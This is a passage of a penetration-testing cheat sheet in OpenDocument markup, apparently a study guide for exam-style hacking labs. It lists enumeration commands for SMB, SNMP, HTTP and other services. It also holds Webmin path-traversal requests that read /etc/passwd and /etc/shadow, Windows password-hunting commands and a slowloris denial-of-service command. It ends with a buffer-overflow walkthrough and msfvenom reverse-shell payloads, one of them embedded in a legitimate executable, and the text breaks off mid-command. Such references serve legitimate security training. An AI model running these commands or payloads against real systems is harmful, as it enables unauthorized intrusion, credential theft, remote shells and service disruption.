privledges<text:line-break/><text:s text:c="8"/>`rpcclient --user="" --command=enumprivs -N $ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Connect to an RPC share with a username and enumerate privledges<text:line-break/><text:s text:c="8"/>`rpcclient --user="&lt;Username&gt;" --command=enumprivs $ip`<text:line-break/><text:line-break/><text:line-break/>-<text:s text:c="3"/>SMB Enumeration<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>SMB OS Discovery<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nmap $ip --script smb-os-discovery.nse`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap port scan<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nmap -v -p 139,445 -oG smb.txt $ip-254`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Netbios Information Scanning<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nbtscan -r $ip/24`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap find exposed Netbios servers<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nmap -sU --script nbstat.nse -p 137 $ip`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap all SMB scripts scan<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap all SMB scripts authenticated scan<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`nmap -sV -Pn -vv -p 445<text:s text:c="2"/>--script-args smbuser=&lt;username&gt;,smbpass=&lt;password&gt; --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>SMB Enumeration Tools<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nmblookup -A $ip<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`smbclient //MOUNT/share -I $ip -N<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`rpcclient -U "" $ip<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`enum4linux $ip<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`enum4linux -a $ip`<text:line-break/><text:s text:c="8"/><text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>SMB Finger Printing<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`smbclient -L //$ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap Scan for Open SMB Shares<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap scans for vulnerable SMB Servers<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap List all SMB scripts installed<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`ls -l /usr/share/nmap/scripts/smb*`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Enumerate SMB Users<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>`nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="9"/>OR<text:s text:c="8"/><text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="9"/>`python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip`<text:line-break/><text:s text:c="9"/><text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>RID Cycling - Null Sessions<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`ridenum.py $ip 500 50000 dict.txt`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Manual Null Session Testing<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="8"/>Windows: `net use \\$ip\IPC$ "" /u:""`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>Linux: `smbclient -L //$ip`<text:line-break/><text:s text:c="8"/><text:line-break/><text:line-break/>-<text:s text:c="3"/>SMTP Enumeration - Mail Severs<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Verify SMTP port using Netcat<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nc -nv $ip 25`<text:line-break/><text:line-break/>-<text:s text:c="3"/>POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet<text:line-break/><text:line-break/><text:s text:c="9"/>root@kali:~# telnet $ip 110<text:line-break/><text:s text:c="9"/>+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready <text:line-break/><text:s text:c="9"/>USER billydean<text:s text:c="4"/><text:line-break/><text:s text:c="9"/>+OK<text:line-break/><text:s text:c="9"/>PASS password<text:line-break/><text:s text:c="9"/>+OK Welcome billydean<text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="9"/>list<text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="9"/>+OK 2 1807<text:line-break/><text:s text:c="9"/>1 786<text:line-break/><text:s text:c="9"/>2 1021<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="9"/>retr 1<text:line-break/><text:s text:c="9"/><text:line-break/><text:s text:c="9"/>+OK Message follows<text:line-break/><text:s text:c="9"/>From: jamesbrown@motown.com<text:line-break/><text:s text:c="9"/>Dear Billy Dean,<text:line-break/><text:line-break/><text:s text:c="9"/>Here is your login for remote desktop ... try not to forget it this time!<text:line-break/><text:s text:c="9"/>username: billydean<text:line-break/><text:s text:c="9"/>password: PA$$W0RD!Z<text:line-break/><text:line-break/><text:line-break/>-<text:s text:c="3"/>SNMP Enumeration -Simple Network Management Protocol<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Fix SNMP output values so they are human readable<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`apt-get install snmp-mibs-downloader download-mibs<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>`echo "" &gt; /etc/snmp/snmp.conf`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>SNMP Enumeration Commands<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>`snmpcheck -t $ip -c public`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>`snmpwalk -c public -v1 $ip 1|`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>`grep hrSWRunName|cut -d\* \* -f`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>`snmpenum -t $ip`<text:line-break/><text:line-break/><text:s text:c="8"/>-<text:s text:c="3"/>`onesixtyone -c names -i hosts`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>SNMPv3 Enumeration<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nmap -sV -p 161 --script=snmp-info $ip/24`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Automate the username enumeration process for SNMPv3:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`apt-get install snmp snmp-mibs-downloader<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>`wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>SNMP Default Credentials<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>/usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt<text:line-break/><text:line-break/><text:line-break/>-<text:s text:c="3"/>MS SQL Server Enumeration<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap Information Gathering<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes<text:s text:c="2"/>--script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`<text:line-break/><text:s text:c="8"/><text:line-break/>-<text:s text:c="3"/>Webmin and miniserv/0.01 Enumeration - Port 10000<text:line-break/><text:line-break/><text:s text:c="6"/>Test for LFI &amp; file disclosure vulnerability by grabbing /etc/passwd<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="8"/>`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="6"/>Test to see if webmin is running as root by grabbing /etc/shadow<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="8"/>`curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Linux OS Enumeration<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>List all SUID files<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`find / -perm -4000 2&gt;/dev/null`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Determine the current version of Linux<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`cat /etc/issue`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Determine more information about the environment<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`uname -a`<text:line-break/><text:s text:c="8"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>List processes running<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`ps -xaf`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>List the allowed (and forbidden) commands for the invoking use<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`sudo -l`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>List iptables rules<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`iptables --table nat --list<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>iptables -vL -t filter<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>iptables -vL -t nat<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>iptables -vL -t mangle<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>iptables -vL -t raw<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>iptables -vL -t security`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows OS Enumeration<text:line-break/><text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>net config Workstation<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>hostname<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>net users<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>ipconfig /all<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>route print<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>arp -A<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>netstat -ano<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>netsh firewall show state<text:tab/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>netsh firewall show config<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>schtasks /query /fo LIST /v<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>tasklist /SVC<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>net start<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>DRIVERQUERY<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>dir /s *pass* == *cred* == *vnc* == *.config*<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>findstr /si password *.xml *.ini *.txt<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>reg query HKLM /f password /t REG_SZ /s<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>reg query HKCU /f password /t REG_SZ /s<text:line-break/><text:line-break/>-<text:s text:c="3"/>Vulnerability Scanning with Nmap<text:line-break/><text:line-break/>-<text:s text:c="3"/>Nmap Exploit Scripts<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Nmap search through vulnerability scripts<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`cd /usr/share/nmap/scripts/<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>ls -l \*vuln\*`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Nmap search through Nmap Scripts for a specific keyword<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`ls /usr/share/nmap/scripts/\* | grep ftp`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Scan for vulnerable exploits with nmap<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`nmap --script exploit -Pn $ip`<text:line-break/><text:line-break/>-<text:s text:c="3"/>NMap Auth Scripts<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Nmap Vuln Scanning<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)<text:line-break/><text:line-break/>-<text:s text:c="3"/>NMap DOS Scanning<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`nmap --script dos -Pn $ip<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>NMap Execute DOS Attack<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>nmap --max-parallelism 750 -Pn --script http-slowloris --script-args<text:line-break/><text:s text:c="4"/>http-slowloris.runforever=true`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Scan for coldfusion web vulnerabilities<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`<text:line-break/><text:line-break/>-<text:s text:c="3"/>Anonymous FTP dump with Nmap<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`nmap -v -p 21 --script=ftp-anon.nse $ip-254`<text:line-break/><text:line-break/>-<text:s text:c="3"/>SMB Security mode scan with Nmap<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>`nmap -v -p 21 --script=ftp-anon.nse $ip-254`<text:line-break/><text:line-break/>-<text:s text:c="3"/>File Enumeration<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Find UID 0 files root execution<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2&gt;/dev/null`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Get handy linux file system enumeration script (/var/tmp)<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`wget https://highon.coffee/downloads/linux-local-enum.sh<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>`chmod +x ./linux-local-enum.sh<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>`./linux-local-enum.sh`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Find executable files updated in August<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`find / -executable -type f 2&gt; /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Find a specific file on linux<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`find /. -name suid\*`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Find all the strings in a file<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`strings &lt;filename&gt;`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Determine the type of a file<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`file &lt;filename&gt;`<text:line-break/><text:line-break/>-<text:s text:c="3"/>HTTP Enumeration<text:line-break/><text:s text:c="4"/>----------------<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Search for folders with gobuster:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>OWasp DirBuster - Http folder enumeration - can take a dictionary file<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Dirb - Directory brute force finding using a dictionary file<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`dirb http://$ip/ wordlist.dict<text:s text:c="2"/>`<text:line-break/><text:s text:c="8"/>`dirb &lt;http://vm/&gt;<text:s text:c="2"/>`<text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="8"/>Dirb against a proxy<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>`dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nikto<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nikto -h $ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>HTTP Enumeration with NMAP<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nmap --script=http-enum -p80 -n $ip/24`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap Check the server methods<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>`nmap --script http-methods --script-args http-methods.url-path='/test' $ip`<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Get Options available from web server<text:line-break/><text:s text:c="9"/>`curl -vX OPTIONS vm/test`<text:line-break/><text:line-break/><text:s text:c="6"/>-<text:s text:c="3"/>Uniscan directory finder:<text:s text:c="2"/><text:line-break/><text:s text:c="10"/>`uniscan -qweds -u &lt;http://vm/&gt;`<text:line-break/><text:line-break/><text:s text:c="6"/>-<text:s text:c="3"/>Wfuzz - The web brute forcer<text:line-break/><text:s text:c="6"/><text:line-break/><text:s text:c="10"/>`wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test<text:s text:c="2"/>`<text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="10"/>`wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ<text:s text:c="2"/>`<text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="10"/>`wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&amp;mail=FUZZ"`<text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="10"/>`wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`<text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="10"/>Recurse level 3<text:line-break/><text:s text:c="10"/><text:line-break/><text:s text:c="10"/>`wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`<text:line-break/><text:line-break/>&lt;!-- --&gt;<text:line-break/><text:line-break/>-<text:s text:c="3"/>Open a service using a port knock (Secured with Knockd)<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201<text:line-break/><text:s text:c="4"/>--max-retries 0 -p $x server\_ip\_address; done<text:line-break/><text:line-break/>-<text:s text:c="3"/>WordPress Scan - Wordpress security scanner<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>wpscan --url $ip/blog --proxy $ip:3129<text:line-break/><text:line-break/>-<text:s text:c="3"/>RSH Enumeration - Unencrypted file transfer system<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>auxiliary/scanner/rservices/rsh\_login<text:line-break/><text:line-break/>-<text:s text:c="3"/>Finger Enumeration<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>finger @$ip<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>finger batman@$ip<text:line-break/><text:line-break/>-<text:s text:c="3"/>TLS &amp; SSL Testing<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha &gt;<text:line-break/><text:s text:c="8"/>OUTPUT-FILE.html<text:line-break/><text:line-break/>-<text:s text:c="3"/>Proxy Enumeration (useful for open proxies)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>nikto -useproxy http://$ip:3128 -h $ip<text:line-break/><text:line-break/>-<text:s text:c="3"/>Steganography<text:line-break/><text:line-break/>&gt; apt-get install steghide<text:line-break/>&gt;<text:line-break/>&gt; steghide extract -sf picture.jpg<text:line-break/>&gt;<text:line-break/>&gt; steghide info picture.jpg<text:line-break/>&gt;<text:line-break/>&gt; apt-get install stegosuite<text:line-break/><text:line-break/>-<text:s text:c="3"/>The OpenVAS Vulnerability Scanner<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>apt-get update<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>apt-get install openvas<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>openvas-setup<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>netstat -tulpn<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Login at:<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>https://$ip:9392<text:line-break/><text:line-break/>Buffer Overflows and Exploits<text:line-break/>===================================================================================================================================<text:line-break/><text:line-break/>-<text:s text:c="3"/>DEP and ASLR - Data Execution Prevention (DEP) and Address Space<text:line-break/><text:s text:c="4"/>Layout Randomization (ASLR)<text:line-break/><text:line-break/><text:line-break/>-<text:s text:c="3"/>Nmap Fuzzers:<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>NMap Fuzzer List<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>[https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>NMap HTTP Form Fuzzer<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>nmap --script http-form-fuzzer --script-args<text:line-break/><text:s text:c="8"/>'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}'<text:line-break/><text:s text:c="8"/>-p 80 $ip<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Nmap DNS Fuzzer<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>nmap --script dns-fuzz --script-args timelimit=2h $ip -d<text:line-break/><text:line-break/>-<text:s text:c="3"/>MSFvenom<text:s text:c="2"/><text:line-break/><text:s text:c="4"/>[*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)<text:line-break/><text:line-break/>-<text:s text:c="3"/>Windows Buffer Overflows<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Controlling EIP<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="13"/>locate pattern_create<text:line-break/><text:s text:c="13"/>pattern_create.rb -l 2700<text:line-break/><text:s text:c="13"/>locate pattern_offset<text:line-break/><text:s text:c="13"/>pattern_offset.rb -q 39694438<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Verify exact location of EIP - [\*] Exact match at offset 2606<text:line-break/><text:line-break/><text:s text:c="12"/>buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Check for “Bad Characters” - Run multiple times 0x00 - 0xFF<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Use Mona to determine a module that is unprotected<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Use NASM to determine the HEX code for a JMP ESP instruction<text:line-break/><text:line-break/><text:s text:c="12"/>/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb<text:line-break/><text:line-break/><text:s text:c="12"/>JMP ESP<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>00000000 FFE4 jmp esp<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Run Mona in immunity log window to find (FFE4) XEF command<text:line-break/><text:line-break/><text:s text:c="12"/>!mona find -s "\xff\xe4" -m slmfc.dll<text:s text:c="2"/><text:line-break/><text:s text:c="12"/>found at 0x5f4a358f - Flip around for little endian format<text:line-break/><text:s text:c="12"/>buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>MSFVenom to create payload<text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="12"/>msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Final Payload with NOP slide<text:s text:c="2"/><text:line-break/><text:s text:c="4"/><text:line-break/><text:s text:c="12"/>buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create a PE Reverse Shell<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444<text:line-break/><text:s text:c="8"/>-f<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>exe -o shell\_reverse.exe<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create a PE Reverse Shell and Encode 9 times with<text:line-break/><text:s text:c="8"/>Shikata\_ga\_nai<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444<text:line-break/><text:s text:c="8"/>-f<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>exe -e x86/shikata\_ga\_nai -i 9 -o<text:line-break/><text:s text:c="8"/>shell\_reverse\_msf\_encoded.exe<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create a PE reverse shell and embed it into an existing<text:line-break/><text:s text:c="8"/>executable<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f<text:line-break/><text:s text:c="8"/>exe -e x86/shikata\_ga\_nai -i 9 -x<text:line-break/><text:s text:c="8"/>/usr/share/windows-binaries/plink.exe -o<text:line-break/><text:s text:c="8"/>shell\_reverse\_msf\_encoded\_embedded.exe<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Create a PE Reverse HTTPS shell<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip<text:line-break/><text:s text:c="8"/>LPORT=443 -f exe -o met\_https\_reverse.exe<text:line-break/><text:line-break/>-<text:s text:c="3"/>Linux Buffer Overflows<text:line-break/><text:line-break/><text:s text:c="4"/>-<text:s text:c="3"/>Run Evans Debugger against an app<text:s text:c="2"/><text:line-break/><text:s text:c="8"/>edb --run 